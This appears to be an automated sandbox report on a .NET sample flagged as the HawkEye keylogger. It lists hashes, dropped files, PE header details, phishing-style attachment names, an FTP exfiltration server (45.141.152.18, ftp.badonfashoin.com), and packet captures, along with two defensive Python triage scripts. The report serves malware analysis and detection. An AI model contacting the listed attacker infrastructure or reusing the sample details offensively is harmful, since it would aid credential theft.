ftp.badonfashoin.com | 87597.exe | malicious | 45.141.152.18

                                                                  ASN

Match | Associated Sample Name / URL | Detection | Context
M247GB | New Updated 20210810.doc | malicious | 45.141.152.18
M247GB | Richiesta di nuove quotazioni (August_2021)_pdf.exe | malicious | 195.206.105.10
M247GB | qfgP28anog | malicious | 196.19.8.214
M247GB | j4nJWqkYkI.dll | malicious | 83.97.20.174
M247GB | Attachment.exe | malicious | 5.181.234.138
M247GB | PAYMENT_CHECK.PDF.EXE | malicious | 217.138.212.57
M247GB | DHL_consignment_number#6225954704.exe | malicious | 188.72.124.14
M247GB | PAYMENT FOR OVERDUE INVOICE.exe | malicious | 37.120.210.211
M247GB | Paymentcheck.pdf.exe | malicious | 217.138.212.57
M247GB | kEtjx4XwPd.exe | malicious | 37.221.121.20
M247GB | w4DEaimFEt | malicious | 194.71.126.19
M247GB | 4A7rphFZrY | malicious | 206.127.221.64
M247GB | fJn3N6piJM | malicious | 45.11.181.37
M247GB | 1sHut1OhEU | malicious | 45.11.181.37
M247GB | dIuTSU7cWx | malicious | 45.11.181.37
M247GB | WVS6wDRacf | malicious | 45.11.181.37
M247GB | 30Bzshze5J | malicious | 45.11.181.37
M247GB | 7D2r6OGZYr | malicious | 45.11.181.37
M247GB | K2pnt8OlRe | malicious | 38.206.34.72
M247GB | clip.exe | malicious | 185.189.112.27

                                                                  JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
54328bd36c14bd82ddaa0c04b25ed9ad | thgYp9F5Xk.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | 6tgS8z4nyu.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | pago ref210721.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | A3Xzw2gfbY.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | PO IN-2108,pdf.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | sunnyzx.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | _RFQ____.EXE | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | scan20210805122905.ppam | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | URGENT DRAWING AND QUOTATION.ppam | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | S010891121011862 pdf.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | BANK INFORMATION.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | PoC.doc | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | PO#578946.arj.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | REQUEST FOR QUOTATION - PCIHBV2021MRP2720.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | Swift E-Posta Bildirimi.zip.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | Payment copy.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | xAUiSzJPP1.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | HprR7lLOSs.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | ZFgurhY9Pk.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | ZYJY-2021010007.DBLF0445+446+441.exe | malicious | 142.250.185.196

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FukQGQj7cl.exe.log
Process: C:\Users\user\Desktop\FukQGQj7cl.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1214
Entropy (8bit): 5.358666369753595
Encrypted: false
SSDEEP: 24:ML9E4Ks2pE4KAE4Kx1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXpHKAHKx1qHxviYHKhQnoPtHoxHe
MD5: EA89F05C52A783E37251BFDA12B31885
SHA1: 96236E27A69CF5271ACCF849A0F4B7058E037D7E
SHA-256: 1EDA95BE1605ED3ABDAB15126811D528B384A9C02C3E7138CEC1BB5BA54B6BD5
SHA-512: 408E7E41062BC9AE729DAC0CA7652FD8A23618A2E984E59CCA0CD4F0678BE2A4E3DDFAAF956FEC2EE70D7A243C10474727F4F7A5DE7DAFCA61AA6048627BDBC0
Malicious: true
Reputation: unknown
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configu
C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Process: C:\Users\user\Desktop\FukQGQj7cl.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 41064
Entropy (8bit): 6.164873449128079
Encrypted: false
SSDEEP: 384:FtpFVLK0MsihB9VKS7xdgE7KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+sPZTd:ZBMs2SqdD86Iq8gZZFyViML3an
MD5: EFEC8C379D165E3F33B536739AEE26A3
SHA1: C875908ACBA5CAC1E0B40F06A83F0F156A2640FA
SHA-256: 46DEE184523A584E56DF93389F81992911A1BA6B1F05AD7D803C6AB1450E18CB
SHA-512: 497847EC115D9AF78899E6DC20EC32A60B16954F83CF5169A23DD3F1459CB632DAC95417BD898FD1895C9FE2262FCBF7838FCF6919FB3B851A0557FBE07CCFFA
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..h>...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s
C:\Users\user\AppData\Local\Temp\holderwb.txt
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type: Little-endian UTF-16 Unicode text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Reputation: unknown
Preview: ..
C:\Users\user\AppData\Roaming\pid.txt
Process: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 4
Entropy (8bit): 2.0
Encrypted: false
SSDEEP: 3:Pn:P
MD5: 7A7C6A5B2F18E21E23049634CEC06C68
SHA1: 1E4F45AEC983B6E26F4EDA228E05D4E16CE1E225
SHA-256: 2FE704A610323B1C0F3375DBEAEE0FA1067FDE32D0130E24D44A4BEFDCA9679E
SHA-512: 9FF4DD011E511B7C0BFB3CC118EB18D50DE8DF117F1DD3CFE6147450FCC300F4B00138DBE33BE1F7D2D817CCE44A78B8FFCFDA10F757E2D478601BD6EA67495C
Malicious: false
Reputation: unknown
Preview: 6284
                                                                  C:\Users\user\AppData\Roaming\pidloc.txt
                                                                  Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):49
                                                                  Entropy (8bit):4.361973558701858
                                                                  Encrypted:false
                                                                  SSDEEP:3:oNWXp5cViE2J5xAIOWRxRI0dAn:oNWXp+N23f5RndA
                                                                  MD5:8069A620598F6D0795A045BC4C040FCE
                                                                  SHA1:BE6C7D1B6E3A49925674F335C601A53E985A2496
                                                                  SHA-256:85E54950497C2B5262439CC09BB7E0779225EAFF0C50B75D59DECE689F2B0625
                                                                  SHA-512:D9AB55D7A597CB3DB20E069AA4893654C7033E42738AD5CF3AA489C5745E3D85CBAD12530542241CD2133C52E108368AA5DB7255692177745A1EEAAFB3398306
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):6.577327226998129
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:FukQGQj7cl.exe
                                                                  File size:1245696
                                                                  MD5:83f58ecf0778e3b0acca8497df23ef23
                                                                  SHA1:a2123e816fcd387873272e022220fbc05b96d392
                                                                  SHA256:437fae5aa2cad8ddb1fe3e316afdc6a1fdd2676084131fdc082ffdc8a53f066d
                                                                  SHA512:aa80d30c7f4234dfd26170b7817788dbdda9c02897d0ac788c253d815a14f444df8dce47c59b05875821f196cb3571de4ec584689059c1a86b7f64f504bf4a63
                                                                  SSDEEP:24576:yVwq/EUmGq/wKgDyT/vcKcPw+U6kulaoS18PNMnDbMZ:yVw8lq/wK4wcKcPrXIIN6P
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......6................................. ... ....@.. .......................`............`................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x53179e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                  Time Stamp:0x36E3D1D7 [Mon Mar 8 13:34:15 1999 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
add byte ptr [eax], al
(the same instruction repeats for the rest of the preview: after the six-byte indirect jmp the disassembler is reading 00 00 padding, which x86 decodes as add byte ptr [eax], al)

                                                                  Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x13174c         0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x132000         0x5f6         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x134000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                  Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x12f7a4      0x12f800  False     0.65637709792    data       6.5816543949    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x132000         0x5f6         0x600     False     0.431640625      data       4.20085481651   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x134000         0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

Name         RVA       Size   Type                                                                        Language  Country
RT_VERSION   0x1320a0  0x36c  data
RT_MANIFEST  0x13240c  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

DLL          Import
mscoree.dll  _CorExeMain

                                                                  Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2020
Assembly Version  1.0.0.0
InternalName      TRCoManagementSystem.exe
FileVersion       1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName       EICANotifications
ProductVersion    1.0.0.0
FileDescription   EICANotifications
OriginalFilename  TRCoManagementSystem.exe
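
The Static PE Info tables above are enough to run the usual first-pass checks on a managed executable by hand: the entry point is a six-byte `jmp dword ptr [IAT slot]` into mscoree!_CorExeMain, the IAT directory is a single slot, the COM descriptor directory is the 0x48-byte CLR header, and the link timestamp decodes to 1999 on a binary whose version resource says Copyright 2020. The Python below is an added example (not the sandbox's code) that performs those checks from the header fields transcribed from the report. The six entry-point bytes are constructed to match the disassembly shown ("jmp dword ptr [00402000h]" encodes as FF 25 00 20 40 00).

```python
"""Static-header triage over the fields listed under "Static PE Info".
Added example, not sandbox code; values are transcribed from the report."""
import struct
from datetime import datetime, timezone

IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x53179E
LINK_TIMESTAMP = 0x36E3D1D7
COPYRIGHT_YEAR = 2020  # LegalCopyright in the version resource

# (name, virtual address, virtual size, raw size) as listed under "Sections"
SECTIONS = [
    (".text", 0x2000, 0x12F7A4, 0x12F800),
    (".rsrc", 0x132000, 0x5F6, 0x600),
    (".reloc", 0x134000, 0xC, 0x200),
]
# (RVA, size) of the data directories that matter for a managed assembly
DIR_IMPORT = (0x13174C, 0x4F)
DIR_IAT = (0x2000, 0x8)
DIR_COM_DESCRIPTOR = (0x2008, 0x48)
IMPORTS = {"mscoree.dll": ["_CorExeMain"]}

# Constructed bytes: FF 25 imm32 is the encoding of "jmp dword ptr [imm32]".
ENTRY_BYTES = bytes([0xFF, 0x25]) + struct.pack("<I", 0x402000)


def section_for_rva(rva):
    """Name of the section containing rva (larger of virtual/raw size), or None."""
    for name, va, vsize, rsize in SECTIONS:
        if va <= rva < va + max(vsize, rsize):
            return name
    return None


def decode_jmp_indirect(code):
    """If code starts with an absolute indirect jmp (FF 25 imm32), return imm32."""
    if len(code) >= 6 and code[0] == 0xFF and code[1] == 0x25:
        return struct.unpack_from("<I", code, 2)[0]
    return None


def link_time_utc(ts=LINK_TIMESTAMP):
    """Decode the COFF TimeDateStamp (seconds since the Unix epoch)."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def managed_stub_checks():
    """Checks that hold for the usual compiler layout of a .NET PE32 image; a
    mismatch (entry point away from the stub, IAT larger than one slot, extra
    native imports) means something was bolted onto the managed image."""
    ep_rva = ENTRYPOINT_VA - IMAGE_BASE
    text_end = SECTIONS[0][1] + SECTIONS[0][2]
    target = decode_jmp_indirect(ENTRY_BYTES)
    return {
        "entrypoint_rva": ep_rva,
        "entrypoint_section": section_for_rva(ep_rva),
        "import_dir_section": section_for_rva(DIR_IMPORT[0]),
        # 6: the jmp stub is the last thing in .text
        "bytes_from_entry_to_text_end": text_end - ep_rva,
        "jmp_reads_iat_slot": target is not None and target - IMAGE_BASE == DIR_IAT[0],
        "single_iat_slot": DIR_IAT[1] == 8,  # one 4-byte thunk plus null terminator
        "clr_header_present": DIR_COM_DESCRIPTOR[1] == 0x48,  # sizeof(IMAGE_COR20_HEADER)
        "only_import_is_corexemain": IMPORTS == {"mscoree.dll": ["_CorExeMain"]},
        "link_year": link_time_utc().year,
        "timestamp_predates_copyright": link_time_utc().year < COPYRIGHT_YEAR,
    }


if __name__ == "__main__":
    for key, value in managed_stub_checks().items():
        print(f"{key:32} {value}")
    print("link time:", link_time_utc().isoformat())
```

Treat the timestamp finding as a lead rather than proof: C# compilers building with /deterministic write a content hash into TimeDateStamp, so an implausible date on a managed assembly does not by itself indicate tampering. The structural checks are the more reliable signal; with pefile or a raw struct parser the same function runs unchanged over a real header.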

                                                                  Network Behavior

                                                                  Snort IDS Alerts

Timestamp                 Protocol  SID      Message                          Source Port  Dest Port  Source IP    Dest IP
08/10/21-16:48:16.909986  TCP       2020410  ET TROJAN HawkEye Keylogger FTP  49745        21         192.168.2.3  45.141.152.18
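
The alert fires on the FTP control session from 192.168.2.3:49745 to 45.141.152.18:21; the packet list under TCP Packets below also shows the client opening a second connection to the same server on port 62025 while the control session is still active, the shape of a passive-mode FTP data channel. The Python below is an added example (not the sandbox's code) that rebuilds bidirectional flows from such a packet list and pairs each control session on port 21 with later client-initiated high-port connections to the same server. PACKETS is a constructed subset of the report's rows with timestamps cut to microseconds; the 5-second pairing window is an assumed tuning value.

```python
"""Flow reconstruction and passive-FTP data-channel pairing over a packet
list in the report's (timestamp, sport, dport, src, dst) form.
Added example, not sandbox code."""
from collections import OrderedDict
from datetime import datetime, timedelta

# Constructed subset of the "TCP Packets" rows (CEST, kept naive).
PACKETS = [
    ("2021-08-10 16:47:03.286838", 49715, 443, "192.168.2.3", "142.250.185.196"),
    ("2021-08-10 16:47:03.319209", 443, 49715, "142.250.185.196", "192.168.2.3"),
    ("2021-08-10 16:48:16.707349", 49745, 21, "192.168.2.3", "45.141.152.18"),
    ("2021-08-10 16:48:16.726089", 21, 49745, "45.141.152.18", "192.168.2.3"),
    ("2021-08-10 16:48:16.891865", 49746, 62025, "192.168.2.3", "45.141.152.18"),
    ("2021-08-10 16:48:16.909324", 62025, 49746, "45.141.152.18", "192.168.2.3"),
    ("2021-08-10 16:48:16.909986", 49745, 21, "192.168.2.3", "45.141.152.18"),
]
LOCAL_NET = "192.168."


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def build_flows(packets):
    """Group packets into flows keyed (client_ip, client_port, server_ip, server_port).
    The first packet seen for a 4-tuple fixes which side is the client."""
    flows = OrderedDict()
    for ts, sp, dp, sip, dip in packets:
        fwd, rev = (sip, sp, dip, dp), (dip, dp, sip, sp)
        key = rev if rev in flows else fwd
        t = parse_ts(ts)
        flow = flows.setdefault(key, {"first": t, "last": t, "packets": 0, "replies": 0})
        flow["packets"] += 1
        flow["replies"] += key == rev
        flow["last"] = max(flow["last"], t)
    return flows


def passive_ftp_data_channels(flows, window_s=5.0):
    """Pair a control flow to port 21 with client-initiated high-port flows to the
    same server that start during the control flow (plus a small window)."""
    pairs = []
    for (cip, cport, sip, sport), ctl in flows.items():
        if sport != 21:
            continue
        deadline = ctl["last"] + timedelta(seconds=window_s)
        for (dcip, dcport, dsip, dsport), data in flows.items():
            if (dcip, dsip) != (cip, sip) or dsport < 1024:
                continue
            if ctl["first"] <= data["first"] <= deadline:
                pairs.append({
                    "client": cip, "server": sip, "control_port": cport,
                    "data_src_port": dcport, "data_port": dsport,
                    "offset_s": (data["first"] - ctl["first"]).total_seconds(),
                })
    return pairs


def summarize(packets=PACKETS):
    flows = build_flows(packets)
    outbound = [(k[2], k[3]) for k in flows
                if k[0].startswith(LOCAL_NET) and not k[2].startswith(LOCAL_NET)]
    return {"flows": len(flows), "outbound_destinations": outbound,
            "ftp_data_channels": passive_ftp_data_channels(flows)}


if __name__ == "__main__":
    for key, value in summarize().items():
        print(key, value)
```

Feeding the full packet list from the report gives the same three flows; the pairing rule is what turns a lone "port 21" hit into a two-connection exfiltration session worth carving from the capture. Active-mode FTP would instead show the server connecting from port 20 back to the client, which this pairing deliberately does not match.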

                                                                  Network Port Distribution

                                                                  TCP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Aug 10, 2021 16:47:03.286838055 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.319209099 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.319341898 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.344588995 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.371298075 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.378534079 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.378568888 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.378587008 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.378601074 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.378699064 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.390443087 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.417469978 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.467937946 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.494936943 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.527563095 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.587394953 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.587471962 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.587511063 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.587548018 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.587591887 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.587672949 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.587713957 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.589498043 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.589549065 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.589603901 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.591752052 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.591803074 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.591831923 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.594002962 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.594033003 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.594094992 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.596246004 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.596271038 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.597017050 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.598578930 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.598612070 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.598648071 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.614294052 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.614326000 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.614408970 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.615329981 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.615350008 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.615407944 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.617686033 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.617705107 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.617768049 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.619887114 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.619906902 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.619961977 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.622170925 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.622189999 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.622253895 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.624443054 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.624466896 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.624515057 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.626682997 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.626708031 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.626768112 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.628974915 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.629003048 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.629056931 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.631133080 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.631156921 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.631222010 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.633013010 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.633019924 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.633088112 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.634911060 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.634943962 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.635001898 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.636804104 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.636831045 CEST  443          49715      142.250.185.196  192.168.2.3
Aug 10, 2021 16:47:03.636898994 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.686708927 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:47:03.772777081 CEST  49715        443        192.168.2.3      142.250.185.196
Aug 10, 2021 16:48:16.707349062 CEST  49745        21         192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.726089001 CEST  21           49745      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.726183891 CEST  49745        21         192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.748107910 CEST  21           49745      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.749362946 CEST  49745        21         192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.767170906 CEST  21           49745      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.767363071 CEST  21           49745      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.767621994 CEST  49745        21         192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.819124937 CEST  21           49745      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.819355011 CEST  49745        21         192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.837003946 CEST  21           49745      45.141.152.18    192.168.2.3
Aug 10, 2021 16:48:16.837682962 CEST  49745        21         192.168.2.3      45.141.152.18
Aug 10, 2021 16:48:16.855254889 CEST  21           49745      45.141.152.18    192.168.2.3
